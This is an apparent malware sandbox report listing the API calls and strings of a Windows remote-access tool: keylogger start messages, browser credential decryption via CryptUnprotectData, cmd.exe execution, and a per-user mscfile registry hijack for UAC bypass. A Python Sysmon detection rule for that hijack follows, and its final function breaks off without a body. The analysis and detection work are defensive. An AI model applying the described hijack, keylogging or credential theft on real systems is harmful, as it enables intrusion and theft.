                                • Opcode ID: 55ab520b62cbc01e0d1004e3f78ad65e034532d4f5c4574cc0f3edc3ad35f3b1
                                • Instruction ID: 9106a42af1dcf347f359e8079d91fbce8cfabd6158495d04cb7d137736bc8ec9
                                • Opcode Fuzzy Hash: 55ab520b62cbc01e0d1004e3f78ad65e034532d4f5c4574cc0f3edc3ad35f3b1
                                • Instruction Fuzzy Hash: AD0171726037257F37611AA75CC8C7F7A6DDAC6BA5319016BB904C3201EA79EE0181B8
                                APIs
                                • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1D7
                                • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1E3
                                • WriteFile.KERNEL32(00000000,00000000,00000000,0040649B,00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1F4
                                • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A201
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandle$CreatePointerWrite
                                • String ID:
                                • API String ID: 1852769593-0
                                • Opcode ID: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
                                • Instruction ID: 9d85e8900f1be3931a26f88ae5ac80d5e45035a8363d546858a313564ae31bc3
                                • Opcode Fuzzy Hash: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
                                • Instruction Fuzzy Hash: 0911C4712062147FE6105A249C88EFB779CEB46375F10076AF556C32D1C6698C95863B
                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBD5
                                • int.LIBCPMT ref: 0040FBE8
                                  • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
                                  • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
                                • std::_Facet_Register.LIBCPMT ref: 0040FC28
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC31
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC4F
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                • String ID:
                                • API String ID: 2536120697-0
                                • Opcode ID: e42b24a72f1c346ef2fbe1d3cf240902612692734d8aa84a6b4d17056c7d6fbb
                                • Instruction ID: 5713401f36b8bb0c26d90e6cd89a0375aabf3697ea4116ccadb9116029d1f595
                                • Opcode Fuzzy Hash: e42b24a72f1c346ef2fbe1d3cf240902612692734d8aa84a6b4d17056c7d6fbb
                                • Instruction Fuzzy Hash: 9811C172904118A7CB24EFA5D80289FB778EF44325F10417FFD44B7291DA389E4A87D8
                                APIs
                                • GetLastError.KERNEL32(?,00000000,?,00439A11,00000000,?,?,00439A95,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004457AE
                                • _free.LIBCMT ref: 004457E3
                                • _free.LIBCMT ref: 0044580A
                                • SetLastError.KERNEL32(00000000), ref: 00445817
                                • SetLastError.KERNEL32(00000000), ref: 00445820
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$_free
                                • String ID:
                                • API String ID: 3170660625-0
                                • Opcode ID: 8116442bc0b7785a5c87a9e5c1511c9661b86afcbe0e70ddbbe26362d10e1a04
                                • Instruction ID: 04032910ca93e9be015006ee1c204adc37b37130fda50a8933af11b0a5b4c0b1
                                • Opcode Fuzzy Hash: 8116442bc0b7785a5c87a9e5c1511c9661b86afcbe0e70ddbbe26362d10e1a04
                                • Instruction Fuzzy Hash: 4101FE36100F0077FB127B366CC992B15699FC2B7AB21413BF40592293EE7DCC01462D
                                APIs
                                • _free.LIBCMT ref: 0044DBB4
                                  • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                  • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                • _free.LIBCMT ref: 0044DBC6
                                • _free.LIBCMT ref: 0044DBD8
                                • _free.LIBCMT ref: 0044DBEA
                                • _free.LIBCMT ref: 0044DBFC
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
                                • Instruction ID: 294e589d6328203d0d12509a579114aacc3179ef351d8ef0a61016021d4f39e6
                                • Opcode Fuzzy Hash: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
                                • Instruction Fuzzy Hash: DDF04F339002146BA620EF6AE9C6C5773D9EE01B15355880AF085E7600EA78FC80965C
                                APIs
                                • _free.LIBCMT ref: 00441566
                                  • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                  • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                • _free.LIBCMT ref: 00441578
                                • _free.LIBCMT ref: 0044158B
                                • _free.LIBCMT ref: 0044159C
                                • _free.LIBCMT ref: 004415AD
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
                                • Instruction ID: 534a9c52bd02544fd4565401bb604a6095318b382a753ef56e7f6fd0a1c42297
                                • Opcode Fuzzy Hash: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
                                • Instruction Fuzzy Hash: 00F030B78052209BD7016F55BC864053BA0BB04B29305853BF8ADE6670FBB90A458F8E
                                APIs
                                • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 004124AD
                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 004124DC
                                • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 0041257C
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                • API ID: Enum$InfoQueryValue
                                • String ID: [regsplt]
                                • API String ID: 3554306468-4262303796
                                • Opcode ID: 5841badb2ff9825d46e36e26999fd6152bd29a2a307a84bebb93b53298b167be
                                • Instruction ID: d2130986b24ed572c5287744f6969716810a156cba9fb87d3bcc7fef363a21f2
                                • Opcode Fuzzy Hash: 5841badb2ff9825d46e36e26999fd6152bd29a2a307a84bebb93b53298b167be
                                • Instruction Fuzzy Hash: A6513C71900219AADB10EBA1DD81EEFB7BDEF04304F10016AF505F2191EF786B49CBA8
                                APIs
                                • _strpbrk.LIBCMT ref: 0044B918
                                • _free.LIBCMT ref: 0044BA35
                                  • Part of subcall function 00439AA3: IsProcessorFeaturePresent.KERNEL32(00000017,00439A75,?,?,?,?,?,00000000,?,?,00439A95,00000000,00000000,00000000,00000000,00000000), ref: 00439AA5
                                  • Part of subcall function 00439AA3: GetCurrentProcess.KERNEL32(C0000417), ref: 00439AC7
                                  • Part of subcall function 00439AA3: TerminateProcess.KERNEL32(00000000), ref: 00439ACE
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                • String ID: *?$.
                                • API String ID: 2812119850-3972193922
                                • Opcode ID: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
                                • Instruction ID: d7c010aeaec7a8a897f36992f2f7f2874d2ac4fe7d304ea8792e53e8e447d7e7
                                • Opcode Fuzzy Hash: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
                                • Instruction Fuzzy Hash: 9C51C371E002099FEF14DFA9C881AAEB7B5EF48314F24816EE954E7301E779DE018B94
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                • API ID: __alloca_probe_16__freea
                                • String ID: H"G$H"GH"G
                                • API String ID: 1635606685-3036711414
                                • Opcode ID: 80076ff913fd6fdf96b59eec9a2e877d4b1c448352c335ccfb263d7e6081886f
                                • Instruction ID: 3c870ea2fb57449e7c992ce38f4d69c2eab2d9a05dd359c3c94aeedaa7d51697
                                • Opcode Fuzzy Hash: 80076ff913fd6fdf96b59eec9a2e877d4b1c448352c335ccfb263d7e6081886f
                                • Instruction Fuzzy Hash: F0411931A00212ABEB219F65CD82A5FB7A1EF45714F54056FF804DB291EBBCDD40879E
                                APIs
                                • __Init_thread_footer.LIBCMT ref: 0040189E
                                • ExitThread.KERNEL32 ref: 004018D6
                                • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00471E78,00000000), ref: 004019E4
                                  • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                • String ID: 8:G
                                • API String ID: 1649129571-405301104
                                • Opcode ID: d11932d744bb97d4d23e75232cb79a590d4ec77f01a60ef524a2726dec1169f8
                                • Instruction ID: 6b8457e9d7ea4966c0dd8dde8758560e0d74fde28bba72e74fe0511dc6260a90
                                • Opcode Fuzzy Hash: d11932d744bb97d4d23e75232cb79a590d4ec77f01a60ef524a2726dec1169f8
                                • Instruction Fuzzy Hash: 7941E7325042005BC324FB65DD86EAFB3A9AB84318F40453FF589621F2DF78994ADB5E
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe,00000104), ref: 00440975
                                • _free.LIBCMT ref: 00440A40
                                • _free.LIBCMT ref: 00440A4A
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                • API ID: _free$FileModuleName
                                • String ID: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe
                                • API String ID: 2506810119-1769797776
                                • Opcode ID: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
                                • Instruction ID: d1e15b597fe779666310b40bee8bd10d15f5dfa451d6ac01ff045fbeec250af7
                                • Opcode Fuzzy Hash: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
                                • Instruction Fuzzy Hash: CA31C4B1A00318AFEB21DF99D88199EBBF8EF84314F10406BF544A7311E6B48E55CB59
                                APIs
                                  • Part of subcall function 00412006: RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
                                  • Part of subcall function 00412006: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
                                  • Part of subcall function 00412006: RegCloseKey.ADVAPI32(00000000), ref: 00412054
                                  • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                                • _wcslen.LIBCMT ref: 00419744
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                • String ID: .exe$program files (x86)\$program files\
                                • API String ID: 37874593-1203593143
                                • Opcode ID: 546b0d98d04e059566fa11c86a24e7130a7516f31b9ccb35c8e0da8d0391a80d
                                • Instruction ID: a7f24a5d9d5c0dc772ada330bc3383911e5a1e9af4e42701afe0c0cb79e45fb3
                                • Opcode Fuzzy Hash: 546b0d98d04e059566fa11c86a24e7130a7516f31b9ccb35c8e0da8d0391a80d
                                • Instruction Fuzzy Hash: CB21B872A001046BDF14BAB6DD968FE37AD9E4831CB04057FF405B32D2ED7D8D5942A9
                                APIs
                                • CreateThread.KERNEL32(00000000,00000000,00409305,00472008,00000000,00000000), ref: 0040928B
                                • CreateThread.KERNEL32(00000000,00000000,004092EF,00472008,00000000,00000000), ref: 0040929B
                                • CreateThread.KERNEL32(00000000,00000000,00409311,00472008,00000000,00000000), ref: 004092A7
                                  • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                                  • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                • API ID: CreateThread$LocalTimewsprintf
                                • String ID: Offline Keylogger Started
                                • API String ID: 465354869-4114347211
                                • Opcode ID: fcb156bf474100ecd8714675bcdacda6a6d505e445d23128ee173ce543fa6834
                                • Instruction ID: c8e77f7b3f84bd49b91c3d3ae4e8ac846fef78eef7351f53fb2416b9cb49ddb0
                                • Opcode Fuzzy Hash: fcb156bf474100ecd8714675bcdacda6a6d505e445d23128ee173ce543fa6834
                                • Instruction Fuzzy Hash: 3211A7A15003083ED210BB669DD6CBB7A5CDA8139CB40057FF845221C3EAB85D19C6FF
                                APIs
                                  • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                                  • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                • CreateThread.KERNEL32(00000000,00000000,004092EF,?,00000000,00000000), ref: 00409EB7
                                • CreateThread.KERNEL32(00000000,00000000,00409311,?,00000000,00000000), ref: 00409EC3
                                • CreateThread.KERNEL32(00000000,00000000,0040931D,?,00000000,00000000), ref: 00409ECF
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$LocalTime$wsprintf
                                • String ID: Online Keylogger Started
                                • API String ID: 112202259-1258561607
                                • Opcode ID: 3095bb4c8629fd0e670b035ea9b5ccaf12231fc020c32c5bedba700ceaefce21
                                • Instruction ID: 28bbfba120e67fe9302c314101e9d6be38f8a9d2e5fa49f3fb55d6307d966583
                                • Opcode Fuzzy Hash: 3095bb4c8629fd0e670b035ea9b5ccaf12231fc020c32c5bedba700ceaefce21
                                • Instruction Fuzzy Hash: 7F01C4A0A042083AE62076768CD6DBF7A6CCA92398B40047FFA45221C3D9B85C5586FE
                                APIs
                                • GetLocalTime.KERNEL32(?), ref: 00404F61
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FAD
                                • CreateThread.KERNEL32(00000000,00000000,00405130,?,00000000,00000000), ref: 00404FC0
                                Strings
                                • Connection KeepAlive | Enabled | Timeout: , xrefs: 00404F74
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                • API ID: Create$EventLocalThreadTime
                                • String ID: Connection KeepAlive | Enabled | Timeout:
                                • API String ID: 2532271599-507513762
                                • Opcode ID: ecde6dd8490a4419ba9d8f450afdef6f270760df43025f419a01a865904151c8
                                • Instruction ID: 3880ceca910d84d0b9b3d3001f949c19a9d90d4f91ad2e0c59d2668d569340f7
                                • Opcode Fuzzy Hash: ecde6dd8490a4419ba9d8f450afdef6f270760df43025f419a01a865904151c8
                                • Instruction Fuzzy Hash: 4F1127719002806AC720BB769C0DE9B7FA89BD2714F44056FF44123281D6B89445CBBA
                                APIs
                                • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData,?,00000000,00406039,?), ref: 00406090
                                • GetProcAddress.KERNEL32(00000000), ref: 00406097
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                • API ID: AddressLibraryLoadProc
                                • String ID: CryptUnprotectData$crypt32
                                • API String ID: 2574300362-2380590389
                                • Opcode ID: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
                                • Instruction ID: 6e7317174224a8efb10ab03f2076fe60a9434866ae70ffeafd7cb5b8c28562e1
                                • Opcode Fuzzy Hash: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
                                • Instruction Fuzzy Hash: C801F535A04205ABCF18CFA9D8049ABBBB8AB54300F00427FE956E3380D635D904C794
                                APIs
                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405139), ref: 00405153
                                • CloseHandle.KERNEL32(?), ref: 004051AA
                                • SetEvent.KERNEL32(?), ref: 004051B9
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                • API ID: CloseEventHandleObjectSingleWait
                                • String ID: Connection Timeout
                                • API String ID: 2055531096-499159329
                                • Opcode ID: 69bf4708d5eac36444cb13c7d4d8205934b4ecb8f60f6f16827c1b7745a6238b
                                • Instruction ID: 59ae86e236e2a5bc5991cc3fd82f69d26eb1b9a4ba12329ef82c58e56ff8d0a2
                                • Opcode Fuzzy Hash: 69bf4708d5eac36444cb13c7d4d8205934b4ecb8f60f6f16827c1b7745a6238b
                                • Instruction Fuzzy Hash: F901F531A40F40AFE711BB368C4551B7BD4FF01302704097FE19356AA1D6B89800CF49
                                APIs
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040D25E
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                • API ID: Exception@8Throw
                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                • API String ID: 2005118841-1866435925
                                • Opcode ID: 07dcd5cdd291a6416836d0c86817599069bcc3367b78dc6d1ec70403740c8f80
                                • Instruction ID: 5123bbd1fc4d669f1c4d6c1cc045f4f856aea5ad0ec182f95f4946492138bf11
                                • Opcode Fuzzy Hash: 07dcd5cdd291a6416836d0c86817599069bcc3367b78dc6d1ec70403740c8f80
                                • Instruction Fuzzy Hash: 0401A261E44208BAD714EAD1C853FBA73689B64705F10806FB911751C2EA7DAA4E862F
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                                • RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                                • RegCloseKey.ADVAPI32(00000000), ref: 00412128
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                • API ID: CloseOpenQueryValue
                                • String ID: origmsc
                                • API String ID: 3677997916-68016026
                                • Opcode ID: d40fef656c83bcaf339f4d5c80b35c3f5e3dd6ef5f24df27a21155112b999244
                                • Instruction ID: 61f3e32b1c93232b19bf4a4cc48abe95026028d342b1827e6ec6edb2467bbf34
                                • Opcode Fuzzy Hash: d40fef656c83bcaf339f4d5c80b35c3f5e3dd6ef5f24df27a21155112b999244
                                • Instruction Fuzzy Hash: 4C014B31800229BBCF219F91DC49DEB7F29EF05761F0141A5BE08A2161D63589BADBA4
                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041487B
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                • API ID: ExecuteShell
                                • String ID: /C $cmd.exe$open
                                • API String ID: 587946157-3896048727
                                • Opcode ID: e8ae4e63c9dc0d6232b12cfcea10d76e3d0f37ee2c59ec5f687c9fc8ea61ff61
                                • Instruction ID: 0094db9d050c86e8b7efcb7c1e993d1de0046a6f7675c6b5aa1ef49a358ded74
                                • Opcode Fuzzy Hash: e8ae4e63c9dc0d6232b12cfcea10d76e3d0f37ee2c59ec5f687c9fc8ea61ff61
                                • Instruction Fuzzy Hash: 8FF017712083049BC304FBB5DC91DEFB39CAB90348F50493FB556921E2EE789949C65A
                                APIs
                                • RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
                                • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
                                • RegCloseKey.ADVAPI32(00000000), ref: 00412054
                                Strings
                                • http\shell\open\command, xrefs: 00412026
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                • API ID: CloseOpenQueryValue
                                • String ID: http\shell\open\command
                                • API String ID: 3677997916-1487954565
                                • Opcode ID: b2b53b33f668fea9d6b70683008644784a8f2d8740eef6bc6becda6435671858
                                • Instruction ID: 0e37d8025f140bc42ec1a8b72352379eb981339daaa9ecb07b48012be1c394e8
                                • Opcode Fuzzy Hash: b2b53b33f668fea9d6b70683008644784a8f2d8740eef6bc6becda6435671858
                                • Instruction Fuzzy Hash: C5F0C271500218FBDB609B95DC49EDFBBBCEB84B12F1040A6BA04E2150DAB55F98C7A5
                                APIs
                                • RegCreateKeyW.ADVAPI32(80000001,Software\Classes\mscfile\shell\open\command,0046FB08), ref: 0041220F
                                • RegSetValueExW.ADVAPI32(0046FB08,00469654,00000000,00000000,00000000,00000000,00469654,?,80000001,?,0040674F,00469654,0046FB08), ref: 0041223E
                                • RegCloseKey.ADVAPI32(0046FB08,?,80000001,?,0040674F,00469654,0046FB08), ref: 00412249
                                Strings
                                • Software\Classes\mscfile\shell\open\command, xrefs: 0041220D
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                • API ID: CloseCreateValue
                                • String ID: Software\Classes\mscfile\shell\open\command
                                • API String ID: 1818849710-505396733
                                • Opcode ID: 3e3fd8a80b9e4d87c81bb3c401438d747e56ec0492b29cf55bc65580399ff691
                                • Instruction ID: 05e6d75f170e8ecdfe9b8062019ada1801530107581382ed9d20477649f1572c
                                • Opcode Fuzzy Hash: 3e3fd8a80b9e4d87c81bb3c401438d747e56ec0492b29cf55bc65580399ff691
                                • Instruction Fuzzy Hash: A1F0AF71440218BBCF00DFA1ED45AEE376CEF44755F00816ABC05A61A1E63A9E14DA94
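The RegCreateKeyW/RegSetValueExW pair above writes HKCU\Software\Classes\mscfile\shell\open\command (0x80000001 is HKEY_CURRENT_USER). That per-user key does not exist on a clean profile; creating it is the well-documented Event Viewer .msc handler hijack used to run a command with auto-elevation, and the sample's RegOpenKeyExA/RegQueryValueExA entry whose strings include 'origmsc' is consistent with saving the handler it overwrites so it can be put back. The following Python rule is an added example, not Joe Sandbox or sample code: it applies that knowledge to Sysmon Event ID 13 (registry value set) records, alerting on any write to the key's default value in a user hive and labelling a write of the stock handler string as a restore. The event records are constructed for the example; the field names follow Sysmon's schema.

```python
r"""Sysmon-based detection for the .msc handler hijack recorded on this page.

Added example, not code from Joe Sandbox or from the analysed sample. It scans
Sysmon Event ID 13 (RegistryEvent, value set) records for writes to
...\mscfile\shell\open\command, the per-user key the sample creates with
RegCreateKeyW(HKEY_CURRENT_USER, ...). HKCU\Software\Classes is a view onto the
HKU\<SID>_Classes hive, which is how Sysmon renders the write, so the rule keys
on the tail of the path. Event records below are constructed for the example.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Tail of the handler key as Sysmon renders it, with the optional default-value marker.
_MSCFILE_TAIL = re.compile(r"\\mscfile\\shell\\open\\command(?:\\\(Default\))?$", re.IGNORECASE)

# Handler string found under HKCR on a clean install (REG_EXPAND_SZ). Setup and
# servicing may write it under machine hives; a user hive never has it.
STOCK_HANDLER = r'%SystemRoot%\system32\mmc.exe "%1" %*'

RAT_IMAGE = r"C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe"   # dropped copy named in the report

# Constructed Sysmon records (dicts keyed by Sysmon field names) sketching the
# registry activity the report's RegCreateKeyW/RegSetValueExW lines imply.
SAMPLE_EVENTS = [
    {"UtcTime": "2024-11-20 10:01:02.100", "EventID": 12, "Image": RAT_IMAGE,
     "TargetObject": r"HKU\S-1-5-21-1000000000-2000000000-3000000000-1001_Classes\mscfile\shell\open\command"},
    # ^ key creation (EID 12) precedes the value write; not scored on its own
    {"UtcTime": "2024-11-20 10:01:02.150", "EventID": 13, "Image": RAT_IMAGE,
     "TargetObject": r"HKU\S-1-5-21-1000000000-2000000000-3000000000-1001_Classes\mscfile\shell\open\command\(Default)",
     "Details": RAT_IMAGE},                                        # handler now points at the RAT
    {"UtcTime": "2024-11-20 10:01:03.000", "EventID": 13, "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-1000000000-2000000000-3000000000-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
     "Details": "DWORD (0x00000001)"},                             # unrelated user-hive write, must not alert
    {"UtcTime": "2024-11-20 10:01:09.400", "EventID": 13, "Image": RAT_IMAGE,
     "TargetObject": r"HKU\S-1-5-21-1000000000-2000000000-3000000000-1001_Classes\mscfile\shell\open\command\(Default)",
     "Details": STOCK_HANDLER},                                    # stock string written back: cleanup after use
    {"UtcTime": "2024-11-20 10:05:00.000", "EventID": 13, "Image": r"C:\Windows\System32\msiexec.exe",
     "TargetObject": r"HKLM\SOFTWARE\Classes\mscfile\shell\open\command\(Default)",
     "Details": STOCK_HANDLER},                                    # servicing re-applying the stock handler: benign
]


@dataclass
class Alert:
    utc_time: str
    image: str
    target: str
    command: str
    kind: str  # "hijack": non-stock handler written; "restore": stock handler put back into a user hive


def detect_mscfile_hijack(events: list[dict]) -> list[Alert]:
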